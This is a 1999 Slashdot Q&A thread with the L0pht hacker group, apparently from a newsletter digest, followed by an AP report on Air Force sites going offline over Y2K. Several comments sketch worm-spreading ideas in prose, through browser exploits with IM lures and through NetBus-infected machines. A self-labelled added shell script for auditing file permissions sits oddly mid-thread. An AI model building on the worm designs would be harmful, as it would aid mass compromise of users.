by Levine (bourgon@bigfoot.com) on Wednesday December 29, @09:26PM EST (#236)

CS people differentiate between an O and a 0 (an 'oh' and a zero) by slashing the zero. If it's wrong, so be it. It still happens.

Levine

Re:0 is Ø. (Score:1)
by generic (larry@[n0sp4m]adm3.com) on Monday January 03, @01:36PM EST (#239)

or is it theta?

Future of Security (Score:0)
by Anonymous Coward on Monday December 27, @12:10PM EST (#10)

What do you think will be the future of computer security? Encryption? I don't think it'll be enough... What will we be doing to protect our data?
Private wireless networks (Score:3, Interesting)
by rise (jconway@ipopros.com) on Monday December 27, @12:12PM EST (#12) http://www.ipopros.com

The L0pht has been involved in independent wireless networking reasonably heavily. What do you see as the most important discoveries/protocols/designs for the next few years? Do you foresee an opportunity for the hardware hacking community to open up the airwaves in the same way Linux & OSS has opened up operating systems and tools?

L0phtCrack (Score:2)
by OnyxRaven (onyxraven@nospamhere.netscape.net) on Monday December 27, @12:13PM EST (#14) http://www.prolynx.com/onyxraven/

At work we recently purchased a copy of L0phtCrack (Guess what - it has saved many many hours of work for me especially!) - for $99? Are you guys making a killing off of this tool or what?

~Nth Dimension~

Distributed Computing (Score:3, Interesting)
by jake_the_blue_spruce on Monday December 27, @12:13PM EST (#16)

Moore's law is that computing power doubles every eighteen months. At the same time, parallel processing and distributed computation (Cosm & Distributed.net) are becoming increasingly common. This leads to an abundance of cheap computing power, enabling brute force attacks on secure systems. In light of these developments, do you see username/password pairs being replaced by anything more resistant to such brute computing force?

"There's so much left to know/ and I'm on the road to find out." -Cat Stevens

Re:Distributed Computing (Score:1)
by jake_the_blue_spruce on Monday December 27, @12:15PM EST (#18)

Shoot. Cosm is at http://cosm.mithral.com/. I thought I checked that link.

"There's so much left to know/ and I'm on the road to find out."
-Cat Stevens

Pronunciation (Score:2, Interesting)
by RAruler (cannabis at home dot com) on Monday December 27, @12:14PM EST (#17)

At one point I thought it was "low-fight" but somewheres I remember it being said as "loft" which would make more sense as L=L 0=O PH=F T=T LOFT

This post uses only 100% recycled electrons.

Re:Pronunciation (Score:1)
by norkakn on Monday December 27, @10:06PM EST (#189)

Hey, better than me... for a while i thought it was "'low fat' heavy industries" with the pun... but then i actually heard the name somewhere *gasp*

jdobbie@kmfms

Re:Pronunciation (Score:1)
by splinter (dull_boy_jack@hotmail.com) on Tuesday December 28, @01:13AM EST (#200) http://www.deimos.org

read your douglas adams, fool.

Re:Pronunciation (Score:0)
by Anonymous Coward on Tuesday December 28, @01:09PM EST (#218)

well, a rather good interview of the crew, 4th Jan 99 BBC2 (UK) had it pronounced "the loft" as the pictures proved, their "den/lair" (can't think of a better word) it is in fact a loft, in Boston. I hope this proves how, but I wonder why? Why, ya think it was Level zero Phreaking Hacking Team?

Future Products (Score:1)
by MoOsEb0y (mooseboy@vqf.com) on Monday December 27, @12:15PM EST (#19)

What products and or projects are you considering in the future? Also, what happened to the wireless networking you were planning (and made a few steps to)? I have often considered setting up something similar to this on a local scale for a few friends. But I think it'd be awesome to be able to be free of US Worst for my internet service.

advisories (Score:1)
by krog (gamache-at-mit.edu) on Monday December 27, @12:16PM EST (#21) http://web.mit.edu/gamache/www

you haven't released any security advisories lately. where do you get your nitrous? can i have some?

Re:advisories (Score:1)
by barleyguy on Monday December 27, @12:32PM EST (#39)

Nitrous is available as a product called "whip-its".
It's manufactured for making whipped cream, but is usually sold at adult bookstores. I'm not sure exactly why....

--- istream >> ostream "We all scream for ice cream!";

Re:advisories (Score:0)
by Anonymous Coward on Monday December 27, @05:04PM EST (#152)

http://www.onepercent.com/whipit.html That's where you can get your nitrous :) --huge coward

Things to come... (Score:0)
by Anonymous Coward on Monday December 27, @12:18PM EST (#23)

Do you have a guesstimate as to when Operating Systems and protocols will make Information Security a non issue (from an attack and penetration perspective)? I have discussed this with my colleagues quite a bit and none of us can really say. This is not bait for Microsoft jokes, either. Developers may eventually wisen up, the day that I hang my A/P hat and retire to a desk job because of this evolution is inevitable, but thankfully not in sight. I would appreciate some comments on this matter... -jcw

Coagulation (Score:1)
by Raffy (rafe.digitaldiscipline@com) on Monday December 27, @12:19PM EST (#24) http://www.digitaldiscipline.com

L0pht- As with any of the well-known infosec groups (you, cDc, &c), it's always a far-flung collective of folks who coalesce and make things happen. How did you meet and decide, "hey, we have common goals and interests, let's do this as a team"?

Rafe V^^^^V Opinions expressed by the author may not actually exist in the wild.

Re:Coagulation (Score:1)
by Synic (synic@linuxfreak.com) on Monday December 27, @03:13PM EST (#129) http://www.lanparty.com

The l0pht and cDc people live in the same city. The l0pht people live in the same building. :) (as far as I remember) This info is on their web page. www.l0pht.org i think.

nope. (Score:0)
by Anonymous Coward on Monday December 27, @05:04PM EST (#151)

some cDc members are in texas, some are in california. One seems to spend a fair bit of time in Canada, although I don't know if he lives there.
The l0pht members (including the mudge, who is also a cDc member) live in boston.

The net: strip mall or unlimited human potential? (Score:5, Insightful)
by garagekubrick (domu13@yahoodotcom) on Monday December 27, @12:19PM EST (#26) http://lifs.org.uk

The halcyon days of the net are gone. With ubiquity - the underground vanishes. Is it well on its way, with people like the CEO of Amazon being worshipped by the mainstream press, to becoming an enormous cyber strip mall, marketing tool, PR exercise in control of perception... Or is there still an underground? Does it still have a potential to be the one true medium with liberation? Will governments and corporations end up controlling it? Cause they are winning small, important victories relentlessly...

"I am not a gun"

,,, (Score:2, Interesting)
by Signail11 on Monday December 27, @12:20PM EST (#27)

Considering the availability of easy to use, secure, persistent, pseudoanonymous nyms (http://www.freedom.com) and the increasing role that electronic commerce plays in our economy, what privacy and security concerns do you anticipate moving to the forefront of attention as this rapidly changing technology evolves?

Actually it's http://www.freedom.net (Score:1)
by LiNT_ on Monday December 27, @01:35PM EST (#77)

See above

IPSEC key debate (Score:1)
by Ruzty on Monday December 27, @12:21PM EST (#28) http://www.moosehead.com/

What is your take on the quashing of the use of photuris, for IPSEC keyserver use over the open to attack isakmp, by the IETF?

"Try to spend the next 30 seconds not thinking about a blue eyed polar bear." -Feodor Dostoevsky

A quickish question (Score:3, Interesting)
by jd on Monday December 27, @12:22PM EST (#30)

The Internet is fragmenting (eg: IPv4 vs. IPv6, Internet 2) and those parts that do have any awareness of security are now beginning to take it seriously (eg: IPSec, SSH). Many other parts are brain-dead, insecure and incoherent.
How do you see things evolving, from this unholy mess?

A question about L0pht constituents: (Score:3, Interesting)
by NateTG on Monday December 27, @12:23PM EST (#31)

What are the non-computer hobbies of the l0pht crew? I suppose that this is a sort of "celebrity interview" question, but I'm curious.

Name Dropping Asswipes (Score:2, Interesting)
by Anonymous Coward on Monday December 27, @12:24PM EST (#32)

I meet a lot of "white hat" security types in my job. Every so often, one of these guys goes into name dropping mode and starts talking about how chummy he is with Mudge. Once I had one of them tell me how he had contacts with the "low fat" guys (although he hadn't heard it pronounced as "loft"). What is it like to have your name(s) dropped by potentially thousands of really clueless people who you might never even meet?

Somebody else would do this, so I'll do it first (Score:0)
by Anonymous Coward on Monday December 27, @12:26PM EST (#34)

What do you propose as a solution to the whole Q1 OSS cheating debacle?

Human interest stuff (Score:1)
by Errant Knyght (knyght@excite.com) on Monday December 27, @12:27PM EST (#35)

Now I know that Mudge has a painting (can't remember who by) hanging around, and I was wondering what artist everyone at L0pht enjoys as well as composers (if any there are into classical music).

Defensive Design Methodologies (Score:4, Insightful)
by FuriousJester (peterman at the temple of funk) on Monday December 27, @12:29PM EST (#36)

I read something to the gist of this recently: "The difficulty with computer security is that programmers write code to allow a course of action, not to prevent another. In order for computer security to become a reality, the design methodology must be changed."

Any programmer worth their check does program defensively. Certain languages support the writing of "safe code" more easily than others. It requires less fore-thought to program defensively in Java than it does in C.
The results, however, will not be as fine tuned. Any methodology for designing and producing safe code must take this, the experience of those implementing it, the environments the product could be used in, into account.

L0pht has compromised many designs. Have you seen any design/impl (hardware or software) methodologies that yield more secure results than others? Could you give reference to them? In my experience, it has always been a matter of refinement. Security is relative.

Nuclear weapons can destroy the world, if used properly. -David Byrne

Windows API (Score:3, Interesting)
by IRNI (irni@irni.net) on Monday December 27, @12:31PM EST (#37) http://www.irni.net

If the windows API was opened because of the DOJ trial, what would you do?
A) Exploit every weakness from here to kingdom come, thereby propelling linux to the forefront.
B) fix everything and tell microsoft so they can make the changes show up in a new release
C) Do A) and grin real big and giggle lots
D) Other | Please Specify ___________________

Re:Windows API - Flawed Logic (Score:1)
by Charlatan (jmutter at ds dot net) on Monday December 27, @04:16PM EST (#143) http://www.freebsd.org/

If the windows API was opened because of the DOJ trial, what would you do? A) Exploit every weakness from here to kingdom come, thereby propelling linux to the forefront.

First, I don't understand how exposing specific Windows vulnerabilities would propel 'linux to the forefront'. Your statement doesn't support your conclusion. Anyhow... (and more on topic with your original post) if you pay attention, every exploit is closely followed by a fix. Exposing weaknesses in Windows would really just help, in the long run, to make it a more viable alternative to UNIX.

Re:Windows API (Score:0)
by Anonymous Coward on Monday December 27, @06:40PM EST (#170)

First I agree with the previous post that exposing weaknesses in windows doesn't have a strong connection to "propelling linux to the forefront".
Also if anyone is seeking to find flaws in windows they probably wouldn't stoop that much lower if they simply decompiled it themselves illegally.

Question: (Score:1)
by sboss (scott at sboss dot net) on Monday December 27, @12:31PM EST (#38)

Do you think there will be any security in the internet of the future? There seems to be more and more security holes (or at least we are finding more). Plus does encryption or digitally signing data help or hinder the net?

Thanks
Scott

Scott C{E,F,O,T}O sboss dot net email: scott@sboss.net

Regret / Useful Software / Orwellian CPUs (Score:2, Interesting)
by MattW (ma++@ender.com) on Monday December 27, @12:34PM EST (#40)

I have a couple questions. Choose whatever you like.

* The silicon valley is froth with IPOs. A huge opportunity exists even in Boston, if you were attached to the city. Do you regret not putting more into a commercial enterprise that could have netted you the millions some people are getting? If so, would you trade your fame in this community for it if you could?

* L0pht spends an enormous amount of time hacking on other peoples' equipment, cracking and analyzing other peoples' software. Without meaning to denigrate such useful activities, do you ever want to stop it for a while and dedicate yourself to the creation of something innovative and positive?

* Somewhere in the future, drowning in gigahertz, manufacturers turn to adding security to their CPUs. CPUs have decryption modules which stop the CPU from running any code not specifically signed and encrypted for your CPU. Your machine (or cpu) would come with a disk or cdrom with a public key you'd provide to vendors (probably on a web page) that would be used to "complete" a build of software that was sold to you, and lock it onto your CPU only. Every piece of software will have a known destination and a known source. Piracy will be a thousand times harder.
Viruses will be wiped out by applying this technology to documents and software alike. Is this the future?

* I see the patent situation forcing software to inevitably go one way or the other: it will either be written only by corporations with tons of money and patents, and be commercial (and by judgement-proof pauper-programmers who have nothing to sue away from them), or the USPTO will suffer through a massive regulation change, and thousands of software/algorithm/business-model patents will be swept away, along with more easy way to review a given patent's "nonobvious"-ness. Where do you think this tragedy is headed?

What does L0pht mean? Maybe an answer (Score:1)
by BradyB (bradyb@mailandnews.spam.com) on Monday December 27, @12:35PM EST (#41)

Well I never really put much thought in to it, but here goes. L0pht Heavy Industries. Perhaps it means Low Phat as in Low Fat , Heavily Used as in high speed low drag industries.

Good is never good enough when you dream of being the best.

evolution of the network (Score:1)
by kootch on Monday December 27, @12:35PM EST (#42) http://students.hamilton.edu/1999/dkutcher

with the local networks expanding from one solitary computer, to 20 computers connected in a room, to wireless devices also now able to connect to large databases and networks, how do you see the security industry (is it considered an industry) responding to these changes and do you foresee any interesting problems arising?

How's the wireless 'net project going? (Score:3, Interesting)
by Anonymous Coward on Monday December 27, @12:35PM EST (#43)

I was digging around the l0pht web site one day and read up on the wireless project you guys were doing trying to make use some old UHF equipment and seeing how far you could spread a free wireless network. So what's the current status of that project?
pls answer the q above (Score:0)
by Anonymous Coward on Monday December 27, @02:18PM EST (#101)

Just recently on slashdot there was talk of large wireless networks using wavelan. I'm especially interested in hearing about the status of guerilla.net. I'm sure answering the question i'm replying to would further the project and get more people involved. thanks

Re:How's the wireless 'net project going? (Score:0)
by Anonymous Coward on Monday December 27, @06:25PM EST (#163)

Packet radio systems have existed for years, invented by Radio Amateurs, there is nothing new here. Packet radio networks exist on HF, VHF and UHF. what's new? Usually the speed of such a network does not exceed 9600baud (kbits/s), especially when using HF, when you transmit your data from one point to another on the globe.

Internet thru packet radio... NOT! (Score:1)
by Inferno (inferno[at]teleport[dot]com) on Tuesday December 28, @03:59AM EST (#204)

The amateur radio packet network is governed by the FCC just like any other amateur radio communications mode. The regulations can be difficult to get around, such as the rule that you MUST have an amateur radio license to transmit anything on an amateur radio frequency. This would put a kink in using IRC for one. You would only be able to converse with valid amateurs, which would be impossible to guarantee.

I looked into setting up a wireless amateur radio packet network at school, as I admin a svr that is currently connected to the Internet AND the packet radio network. I couldn't legally use IRC thru the radio link because the folks I would chat with do not have FCC amateur radio licenses. 'Bout the only thing this would come in handy for would be remote system administration, but then you would have to look at the fact that packet radio is an OPEN mode of communication. Anyone with a TNC and radio receiver would be able to monitor what was going on.
And forget about using SSH or some similar mode of secure shell access -- the FCC forbids the use of encryption. :(

Question (Score:1)
by Necroleptic (auto33629@hushmail.com) on Monday December 27, @12:39PM EST (#45)
(User Info) http://users.bergen.org/~johsan

What are your opinions on "script kiddies" and your propagation of these people? Don't you believe that people who would want to be hackers should learn through experience, much like yourselves?

Security Lint (Score:3, Interesting)
by Omniscient Ferret (jyoung@cs-sun1.truman.edu) on Monday December 27, @12:39PM EST (#46)
(User Info) http://cs-sun1.truman.edu/~jyoung/index.htm

For assurance, before installing software on a secure-as-plausible machine, I would love to have an automated for security problems, such as buffer overflows. So, how is the development of SLINT progressing? Are you still planning to release it?

Re: Security Lint (Score:1)
by Omniscient Ferret (jyoung@cs-sun1.truman.edu) on Monday December 27, @01:01PM EST (#56)
(User Info) http://cs-sun1.truman.edu/~jyoung/index.htm

Er, that should be "love to have automated scanner".

Welcome, our door is open (Score:2, Interesting)
by lildogie on Monday December 27, @12:40PM EST (#47)
(User Info)

What do you think about the wisdom of linking a planetary network of desktop computers to a radio telescope, hoping to go online with any extra-terrestrial who cares to open our collective port?

Little Dogie

Internet Worm II (Score:4, Interesting)
by tilly on Monday December 27, @12:43PM EST (#48)
(User Info)

Several months ago I began predicting that someday someone would find a buffer overflow in the various Windows TCP-IP stacks and use it to write a worm that would bring down the Microsoft part of the Internet and cause so much traffic as to effectively shut down everything else.
I further predict that until an event of this magnitude happens, the general public will not really learn the basic lessons about security that the *nix world was forced to learn from the first worm.

What are your thoughts on this prediction? (Timeline, reasonableness, etc.)

Regards,
Ben

I miss the old InfoWorld forums. :-(

Re:Internet Worm II (Score:1)
by jesser on Monday December 27, @04:20PM EST (#144)
(User Info) http://www.palosverdes.com/jesse/

windows 95 had at least one buffer overflow exploit.. one had to do with putting fragmented things together. was this hole exploitable for running arbitrary code or only for crashing the box? if the former, why wasn't there a worm?

also.. as an idea for a worm.. how about a worm that opens up port 80 with enough code to exploit known security holes in various versions of msie and netscape plus some silly stuff to make it look innocent, and then IMs everyone (msnim, aim, icq, yahoo, etc) who's online and tells them to "look at your website"? it could also affect frontpage uploads...

-- Warning: this sig attracts all other sigs with a force proportional to funniness and inversely proportional to distance squared.

Re:Internet Worm II (Score:0)
by Anonymous Coward on Monday December 27, @06:31PM EST (#164)

1. Think of this, Cisco/Bay and other routers running their own stacks, which have probably not been evaluated externally. what if one of them contains an overflow? not even the stack, every router has a few ports open, the code behind them could have problems as well.

2. There is this nifty commercial stack (I forgot the name) which is used in HPUX 11.x, and quite a few embedded and proprietary systems. who knows if it's been evaluated.
even if a code has been evaluated by people who do know their stuff, after all, these people are human, so, until such a stack doesn't get evaluated by 1million programmers across the planet, for at least a year, it couldn't be considered really safe, even then, see the latest Linux 2.2.12 and below 'blind spoofing' thing.

Re:Internet Worm II (Score:2)
by sinnergy (froggy@eecs.cwru.edu) on Tuesday December 28, @07:36AM EST (#207)
(User Info) http://froggy.raex.com/

You make an interesting point. The problem is, though, that many Unix shops (the small to medium sized ones at least) don't know what the lessons were from the first Worm. I'm only 23 and I learned about it through lore more than anything else.

For everyone's sake, I hope you're not right, but I do believe that a good dose of prevention and education would be in order for most of us Sysadmins. Convincing management of this necessity, though, is almost impossible. With focus more on the here and now as opposed to keeping an eye out for potential problems, it's hard to keep abreast of security technologies

- CWRUton for Life - (sad but true!)

Re:Internet Worm II (netbus) (Score:0)
by Anonymous Coward on Wednesday December 29, @11:47AM EST (#232)

Well, as 1% or 10% (or ??%) are infected by netbus installations, a worm could simply propagate from one netbus PC to the next. Would be the first worm using a trojan to propagate :-)

George

Security and Open Source (Score:0)
by Anonymous Coward on Monday December 27, @12:44PM EST (#49)

Do you believe that it is possible to provide a secure computing model in an open source environment? If so, how?

Proper NT rootkit. (Score:3, Interesting)
by Zurk (zurk@SPAMSUCKSgeocities.com) on Monday December 27, @12:51PM EST (#50)
(User Info)

Hi guys, Any plans to write a proper Win2K/NT rootkit (the kind that was published on Phrack a while back - that replaces or adds to the actual calls in the win32 ring 0 system with its own) soon?

Re:Proper NT rootkit.
(Score:0)
by Anonymous Coward on Monday December 27, @06:31PM EST (#165)

You write one if you need it so badly, or go to www.rootkit.com, where kids like you can download such stuff.

Re:Proper NT rootkit. (Score:0)
by Anonymous Coward on Tuesday December 28, @03:50PM EST (#219)

you can't get a ring 0 rootkit there or anywhere else dummy.

Simple question (Score:1)
by Ricochet (ncherry@dmc.uucp) on Monday December 27, @12:54PM EST (#51)
(User Info) http://members.home.net/ncherry/

(First the silly question) Prove your existence :-)

(Now the real question) How do we get back control of our information?

Re:Simple question (Score:0)
by Anonymous Coward on Monday December 27, @06:33PM EST (#166)

1. already proven, see them at DefCon, Blackhat and other places.
2. We never will, once it's out there, it's on the loose, like a wild animal.

Security? (Score:1)
by Raffy (rafe.digitaldiscipline@com) on Monday December 27, @12:55PM EST (#52)
(User Info) http://www.digitaldiscipline.com

Assume you own a server to run the following protocols: HTTP, POP/POP3, SMTP, NNTP, telnet, FTP. Can such a machine be secure under -any- OS? If this was sitting in your basement, what would you do with it (after loading Q3A/UT and distributed.net's latest client ;-) to make sure the script kiddies didn't f*ck with you?

Rafe
V^^^^V
Opinions expressed by the author may not actually exist in the wild.

Re:Security? (Score:2)
by Chandon Seldon (acorn@gis.net) on Monday December 27, @03:23PM EST (#131)
(User Info) http://www.calug.net/

Assume you own a server to run the following protocols: HTTP, POP/POP3, SMTP, NNTP, telnet, FTP. Can such a machine be secure under -any- OS? If this was sitting in your basement, what would you do with it (after loading Q3A/UT and distributed.net's latest client ;-) to make sure the script kiddies didn't f*ck with you?

How I'd go about giving it maximum security.
(Disclaimer: I've never actually set up a server running more than HTTP + FTP + POP3)

1. Partition the machine into the following partitions:
     / (ro)
     /home/httpd (ro if possible)
     /home/mail (rw)
     /home/news (rw)
     /home/ftpd (ro if possible)
2. Install the most recent version of OpenBSD
3. Install any security fixes
4. Remove distributed.net's latest client and Q3A
5. Create the following new users: httpd, pop3d, nntpd, ftpd, telnet, unperson, admin
6. Set the permissions for all the files on the machine as strict as possible.
7. Set up a program to forward all requests on ports below 1024 to ports 10000 through 11024.
8. Set each server as its own user, and make sure that one user can't affect the files of another in any way.
9. Set up each server on standard_port+10000, and have them each store their files in their own partition (mounted under /home)
10. Use the simplest, most secure server for each task. Yes, this means you can't use apache.
11. Don't allow telnet logins as anyone but admin.
12. Set up the admin account with the minimum set of privileges necessary to administer the machine.
13. Go "chown root /bin/chmod; chmod og-rwx /bin/chmod"
14. "chmod a-x" any programs that aren't absolutely necessary to the machine working, like 'su', 'chown', 'fortune', etc.
15. Change your root and admin passwords weekly.
16. Do anything that you should do that I missed.

This should, at best, prevent anyone from messing with the machine at all. At worst, if someone does get in, they shouldn't be able to do anything - anything at all.

--------
The act of censorship is always worse than whatever is being censored.
-Chandon Seldon

Re:Security? (Score:1)
by Spamizbad on Tuesday December 28, @02:10AM EST (#201)
(User Info)

How about also getting rid of telnet and using Openssh (included with OpenBSD, no?). Mmm... 128bit encryption.

Re:Security?
(Score:0)
by Anonymous Coward on Monday December 27, @06:34PM EST (#167)

Many things can be done, this is not the place to discuss them, why don't you come up with something new? meanwhile, see the StackGuard/PointerGuard/openwall projects.

Slint (Score:2, Interesting)
by Emphyrio (emphyrio@rvdm.op.het.net) on Monday December 27, @12:58PM EST (#53)
(User Info) http://rvdm.op.het.net

According to your site, you have developed a quite powerful source code security analysis tool. A while ago, this tool was not distributable, and closed source. Do you plan on releasing Slint and/or other currently closed source L0pht tools in an open source license, or in some other freely distributable binary form?

Questions (Score:1, Interesting)
by Anonymous Coward on Monday December 27, @01:00PM EST (#55)

I've been checking out the 'L0pht' ever since the days when mudge posted the page up asking how many boxes everyone had up, but anyways...

Is there any work still being done on the 'guerilla net' project? The page hasn't been updated in ages. Did you guys ever manage to locate the TX ready pin on the WaveLAN cards to switch the amplifier on?

What happened to the user pages on www.l0pht.com?

What are your main development platforms?

...And of course, what's the best piece of equipment you've dug out of the garbage so far?

software liability (Score:0)
by Anonymous Coward on Monday December 27, @01:08PM EST (#57)

hi guys. when you testified before congress, one of you (I believe it was Weld Pond) said that software manufacturers need a financial incentive to ship secure software. I believe that you went on to say that they should be held partially liable for damages caused by bugs in their software. How do you think that legislation like that would affect the open source movement?
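
[Added example, not part of the Slashdot thread or of Chandon Seldon's post: one way to check steps 6 and 8 of the hardening list in comment #131 above (each server under its own account, no account able to change another server's files). The function names, the owner/directory argument pairs and the sample tree are assumptions made for this example.]

```shell
#!/bin/sh
# Audit for steps 6 and 8 of the checklist: every server runs as its own
# account and no other account can change that server's files.
# Assumption (not from the post): each service tree is passed together with
# the account that should own it, e.g.  httpd /home/httpd

# audit_tree OWNER DIR
# Prints one line per problem found under DIR:
#   owner <path>   entry is not owned by OWNER
#   write <path>   entry is group- or world-writable
# Symbolic links are skipped: their own mode bits are not enforced.
audit_tree() {
    _owner=$1
    _dir=$2
    find "$_dir" ! -type l ! -user "$_owner" -print | sed 's/^/owner /'
    find "$_dir" ! -type l \( -perm -020 -o -perm -002 \) -print | sed 's/^/write /'
}

# count_findings OWNER DIR
# Prints the number of problems; 0 means the tree is isolated.
count_findings() {
    audit_tree "$1" "$2" | wc -l | tr -d ' '
}

# audit_all OWNER DIR [OWNER DIR ...]
# Audits every pair, prints the findings, and returns non-zero if any tree
# has one, so a cron job can alert on the exit status.
audit_all() {
    _bad=0
    while [ "$#" -ge 2 ]; do
        if [ "$(count_findings "$1" "$2")" -ne 0 ]; then
            audit_tree "$1" "$2"
            _bad=1
        fi
        shift 2
    done
    return "$_bad"
}

# build_sample DIR
# Constructed sample tree standing in for /home/httpd, with two deliberate
# mistakes so the audit has something to report.
build_sample() {
    mkdir -p "$1/htdocs" "$1/upload"
    : > "$1/htdocs/index.html"
    : > "$1/htdocs/stats.log"
    chmod 755 "$1" "$1/htdocs"
    chmod 644 "$1/htdocs/index.html"
    chmod 666 "$1/htdocs/stats.log"   # world-writable file
    chmod 777 "$1/upload"             # world-writable directory
}

# Run against the trees named in the checklist, for example:
#   sh audit.sh httpd /home/httpd ftpd /home/ftpd
if [ "$#" -ge 2 ]; then
    audit_all "$@"
fi
```

A world-writable directory is reported even when every file inside it is read-only, because write access to the directory is enough to delete or replace those files.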
Differences in interest (Score:1)
by BlueCalx- (nickd@nickd.org) on Monday December 27, @01:11PM EST (#58)
(User Info) http://nickd.org

Sometimes, corporations are ignorant of your advisories, as they feel the general hacking community is only destructive and has little to offer. It also seems obvious in ABCNews' report that people have an inherent fear of the hacking/cracking community in general. The intent of some groups (cDc comes to mind) is different from others (gH), and as a result it becomes difficult to create an accurate definition of what hacking/cracking really is.

My question is this: do you feel the negative publicity and stereotypes of hackers and crackers rubs off on l0pht to some extent?

-- BlueCalx | http://nickd.org/

IPv6 (Score:0)
by Anonymous Coward on Monday December 27, @01:12PM EST (#59)

Hi. Lots of companies are shipping "VPN" solutions that are simply IPv6 boxes. Do you feel that IPv6 is adequate for this purpose? Will IPv6 really prevent the types of attacks we've seen with IPv4?

Please reply to this! (Re:IPv6) (Score:1)
by dibos (krooger@debian.BLOCKSPAM.org) on Monday December 27, @06:41PM EST (#172)
(User Info) http://master.debian.org/~krooger

Good question. I have heard that IPv6 is as insecure as IPv4; I'd like to know more about that.

A Question of Principle (Score:2, Interesting)
by sudog on Monday December 27, @01:12PM EST (#60)
(User Info)

I was not impressed to see L0pht embrace any form of commercial philosophy. While it is true I live in a fairly isolated section of the world, I and the community I live within have the general impression that you are no longer available to the public. It appears as though you have sequestered yourselves away in your building(s) and sent Mudge out to maintain good PR.

What I mean is, aside from the odd security release and product update, you guys seem to have disappeared from the face of the earth. What are you up to?
Are you still truly pursuing the tenet that is listed prominently on your BBS? "Freedom, freedom, blah" -lhi, psalm blah verse blah? Do you see yourselves as this inaccessible except to people willing to fork over large dollars, or am I just living on the moon?

Re:A Question of Principle (Score:1)
by God I hate mornings (dj_batt at worldnet dot att dot net) on Monday December 27, @01:37PM EST (#80)
(User Info)

I don't think that they're pursuing the almighty dollar. I have contacted them several times with hopes of getting them to do some security work for various clients of mine. All had the potential for very nice paychecks at the end. They refused the work, very politely tho. SO I think you might be a bit off base. But I could be wrong.

GIHM
-The light at the end of the tunnel is only the oncoming train.

Capabilities in Linux (Score:1)
by Nemesys on Monday December 27, @01:13PM EST (#61)
(User Info)

Hi - this is a specific question. Do you think we'll see capabilities begin to replace root in Linux? What will that world be like? When will it happen?

Re:Capabilities in Linux (Score:0)
by Anonymous Coward on Monday December 27, @06:37PM EST (#168)

It will take a long *long* time before such a thing fully merges into the Linux tree. Meanwhile look at www.eros-os.org and pray for them to complete it. If you're really interested, search for documentation on Boeing SNS and Honeywell SCOMP.

OpenBSD (Score:0)
by Anonymous Coward on Monday December 27, @01:14PM EST (#62)

How secure do you feel linux is? Please compare or contrast this with OpenBSD.

Re:OpenBSD (Score:0)
by Anonymous Coward on Monday December 27, @06:39PM EST (#169)

A lot less, see what the OpenBSD kernel has to offer in terms of security. The usermode code has been also reviewed and made stronger. much less code, more eyes watching it, the result, better security.

Reply to this letter.
(Score:5, Funny)
by An0nymousC0ward (president@whitehouse.gov) on Monday December 27, @01:14PM EST (#63)
(User Info) http://www.slashdot.org

This letter was recently published in the columbus dispatch (Ohio's greatest home newspaper....yea right). What would your response be to this person?

Letter to the editor: Opening windows could let bad guys do a lot of damage
Saturday, December 25, 1999

I was amazed to see that the Clinton administration, in its initial victory over Microsoft, wants the source code to Windows to be made public. I'm sure it will follow up with a demand that all banks publish the combinations to their safes and freely distribute keys to both their front and back doors. Perhaps they will make banks install a large button so visitors can disable all alarms. Making the world safe for bank robbers would be a lot better than making Windows' source code public.

The year 2000 problem is nothing compared to what a hacker could do with the code to Windows. The anti-virus software today depends on two primary tests to find a virus: the Cyclic Redundancy Checksum and file size. A virus attaches itself to a program and runs when the program runs. Rather than get into a complex technical discussion, let us just say every computer file has a fingerprint. If a virus is attached, the file's fingerprint changes. An anti-virus program just looks for the fingerprints left by the virus.

However, if one has the source code to Windows, a file with a virus can be made with the same fingerprint as a file without the virus. Even worse, the operating system, instead of being the virus cop, becomes the virus enabler. Imagine a world where half the people in uniform are trying to rob you and where dialing 911 brings a band of serial killers to your door. Such a virus would be very, very difficult to fight.

Police try to catch such people by tracing who benefits. But when the goal is revenge and not profit, it gets tough to catch the bad guys.
If you think catching the Unabomber was time consuming, this would make the search for the Unabomber look very fast, indeed.

So with the Windows source code, the hacker could write a program that on June 1, 2001, swaps all bank balances. Someone whose name starts with an A gets Z's balances. Throw credit cards into that mix, and there could be real fun. Maybe some hacker would find it fun to pay off everyone's property taxes. I'll bet everyone who had not paid his tax would tell the truth and pay up voluntarily, wouldn't they?

Every programmer I have ever met has always left himself a back door into every system he writes. Does anyone want to bet Microsoft does not have a back door to its software? Does anyone believe that if the judge makes Microsoft publish the source code, Bill Gates would remove the back door before publishing it? He would not dare. The judge might put him in jail for modifying the code. Couldn't have that now, could we?

If he would leave it in, every highly skilled programmer would have a key to everything running on Microsoft software. We can rest assured that every hacker is totally honest, can't we? And with the Internet, those hackers would all be in places where Americans are loved, such as Belgrade, Yugoslavia, and Baghdad, Iraq, for example.

Some hacker might even have fun with a newspaper, such as removing the names of everyone who is a subscriber and replacing them with the names of people who are not. Did I mention court records, employment records, child support records?

All Microsoft bashers in and out of government should beware. It looks like they are going to get what they wished for.

Ray Malone
MBS Software
Chillicothe, Ohio

a real zero.

Re:Reply to this letter. (Score:0)
by Anonymous Coward on Monday December 27, @02:34PM EST (#114)

I'd call him an idiot and get on with things.

Re:Reply to this letter.
(Score:0, Offtopic)
by BiLlCaT (neo_at_jay_pee_jay_dot_net) on Monday December 27, @03:27PM EST (#132)
(User Info) http://www.jpj.net/~neo

i blew stewart's through my nose when i read this. as if anyone could (or would want to) analyze the source for windows. holy christ... just look at the mozilla project. of course the code to MS's TCP stack might be fun to tinker with (not). l8r.

--bc

@HWA

25.0 AirForce to Close Web Sites Over Y2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by Evil Wench

Instead of properly securing public access systems and remaining vigilant over the New Years holiday the Air Force has decided to retreat and deny the public its right to information. Fearing online attacks over the upcoming holiday they have decided to shut down some public web sites which they hope will protect them from attack. (Your web site will have the same holes on New Years day as it will the day after.)

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/19991228/tc/y2k_military_web_sites_1.html

Tuesday December 28 2:41 AM ET

Air Force To Close Some Web Sites
By JAMES HANNAH Associated Press Writer

DAYTON, Ohio (AP) - Fearing attacks by computer hackers, some Air Force bases plan to block access to their public World Wide Web sites over the New Year's weekend, officials say.

Other bases have been asked to consider closing down their sites temporarily.

``Each one of the Web masters were told they might want to consider any vulnerabilities,'' Maj. John Anderson, an Air Force spokesman at the Pentagon, said Monday. For some, he said, that means blocking access at a prime time for Internet pranks.

